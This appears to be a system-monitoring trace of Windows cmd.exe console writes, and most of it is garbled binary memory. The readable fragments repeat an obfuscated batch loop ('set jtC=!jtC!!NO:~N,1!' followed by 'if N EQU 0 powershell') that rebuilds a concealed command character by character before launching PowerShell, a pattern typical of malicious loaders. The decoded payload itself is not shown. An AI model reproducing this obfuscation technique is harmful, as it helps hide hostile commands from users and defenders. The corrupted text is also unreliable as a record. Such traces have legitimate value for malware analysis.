Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...M-..........................G-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.3. .E.Q.U. .0. .S-..............................\...M-................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.Y-....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...e-..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...l-..........................s.k.t.o.p.>.@..JD.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J^.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...x-............................2..@..`.2...3.`...`.....*u..2.........9..9........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.2.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....-..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....-...........................-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.2. .E.Q.U. .0. ..-..............................\....-................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..-....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....-..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....-..........................s.k.t.o.p.>.@..J^.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....-............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.1.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....-..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....-...........................-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.1. .E.Q.U. .0. ..-..............................\....-................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..-....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....-..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....-..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....-............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.7.0.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....-..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\................................-........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.7.0. .E.Q.U. .0. .................................\.....................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.......................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...............................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...#...........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..JL.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\.../.............................2..@..`.2...3.`...`.....*u..2.........9..9........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.9.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...;...................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...A...........................;.........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.9. .E.Q.U. .0. .G...............................\...A.................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.M.....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...Y...........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...`...........................s.k.t.o.p.>.@..JL.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jn.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...l.............................2..@..`.2...3.`...`.....*u..2.........9..9........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.8.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...x...................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...~...........................x.........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.8. .E.Q.U. .0. .................................\...~.................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.......................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...............................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...............................s.k.t.o.p.>.@..Jn.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\.................................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.7.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\.......................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\.........................................................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.7. .E.Q.U. .0. .................................\.....................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.......................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...............................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...............................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\.................................2..@..`.2. .3.`...`.....*u..2.........}..e........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.6.,.1.!. ...............2..@..`.2. .3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\.......................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\.........................................................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.6. .E.Q.U. .0. .................................\.....................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l../....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..JT.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...#/............................2..@..`.2...3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.5.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...//..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...5/..........................//........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.5. .E.Q.U. .0. .;/..............................\...5/................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.A/....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...M/..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...T/..........................s.k.t.o.p.>.@..JT.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J~.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...`/............................2..@..`.2...3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.4.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...l/..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...r/..........................l/........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.4. .E.Q.U. .0. .x/..............................\...r/................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.~/....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................s.k.t.o.p.>.@..J~.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\..../............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.3.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\..../..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\..../.........................../........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.3. .E.Q.U. .0. ../..............................\..../................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l../....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\..../..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J2.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\..../............................2..@..`.2.`.3.`...`.....*u..2.........u..m........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.2.,.1.!. ...............2..@..`.2.`.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\..../..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\..../.........................../........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.2. .E.Q.U. .0. ../..............................\..../................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l../....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................s.k.t.o.p.>.@..J2.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J\.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....0............................2..@..`.2...3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.1.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...#0..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...)0..........................#0........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.1. .E.Q.U. .0. ./0..............................\...)0................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.50....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...A0..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...H0..........................s.k.t.o.p.>.@..J\.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...T0............................2..@..`.2...3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.6.0.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...`0..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...f0..........................`0........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.6.0. .E.Q.U. .0. .l0..............................\...f0................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.r0....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...~0..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....0............................2..@..`.2.(.3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.9.,.1.!. ...............2..@..`.2.(.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....0..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....0...........................0........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.9. .E.Q.U. .0. ..0..............................\....0................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..0....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jr.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....0............................2..@..`.2...3.`...`.....*u..2.........m..y........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.8.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....0..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....0...........................0........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.8. .E.Q.U. .0. ..0..............................\....0................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..0....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....0..........................s.k.t.o.p.>.@..Jr.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jd.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....1............................2..@..`.2.h.3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.7.,.1.!. ...............2..@..`.2.h.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....1..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....1...........................1........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.7. .E.Q.U. .0. .#1..............................\....1................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.)1....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...51..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...<1..........................s.k.t.o.p.>.@..Jd.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...H1............................2..@..`.2.h.3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.6.,.1.!. ...............2..@..`.2.h.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...T1..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...Z1..........................T1........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.6. .E.Q.U. .0. .`1..............................\...Z1................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.f1....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...r1..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...y1..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jh.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....1............................2..@..`.2.h.3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.5.,.1.!. ...............2..@..`.2.h.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....1..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....1...........................1........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.5. .E.Q.U. .0. ..1..............................\....1................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..1....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....1..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....1..........................s.k.t.o.p.>.@..Jh.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....1............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.4.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....1..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....1...........................1........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.4. .E.Q.U. .0. ..1..............................\....1................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..1....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....1..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....1..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jl.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....1............................2..@..`.2.h.3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.3.,.1.!. ...............2..@..`.2.h.3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....2..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....2...........................2........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.3. .E.Q.U. .0. ..2..............................\....2................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..2....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...)2..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...02..........................s.k.t.o.p.>.@..Jl.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J..3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...<2............................2..@..`.2...3.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.2.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\...H2..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\...N2..........................H2........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.2. .E.Q.U. .0. .T2..............................\...N2................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l.Z2....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...f2..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\...m2..........................s.k.t.o.p.>.@..J..3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jp.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\...y2............................2..@..`.2...3.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.1.,.1.!. ...............2..@..`.2...3...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....2..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....2...........................2........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.1. .E.Q.U. .0. ..2..............................\....2................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..2....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....2..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....2..........................s.k.t.o.p.>.@..Jp.3.......o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..J:.4.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....2............................2..@..`.2.h14.`...`.....*u..2.....................
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.5.0.,.1.!. ...............2..@..`.2.h14...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....2..................................,.................o.4............F.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................i.f. ...........\....2...........................2........................o..............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................5.5.0. .E.Q.U. .0. ..2..............................\....2................o.....d.......`I.J....\...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................p.o.w.e.r.s.h.e.l.l..2....................................o.....................t...............UF.J
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....2..........................@F.J....P.......D....m.Jp.o.h............E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: ....................................\....2............................4...0...4......r4...0...o.....8........E.J....0...
Source: C:\Windows\System32\cmd.exe	Console Write: ....................C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.e.s.k.t.o.p.>.@..Jt.3.................<...8..........w....
Source: C:\Windows\System32\cmd.exe	Console Write: ....................s.e.t...........\....2............................2..@..`.2. .4.`...`.....*u..2.........=..=........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .j.t.C.=.!.j.t.C.!.!.N.O.:.~.5.4.9.,.1.!. ...............2..@..`.2. .4...o.........,....E.J........
Source: C:\Windows\System32\cmd.exe	Console Write: .................... .&.&. .........\....2..................................,.................o.4............F.J........
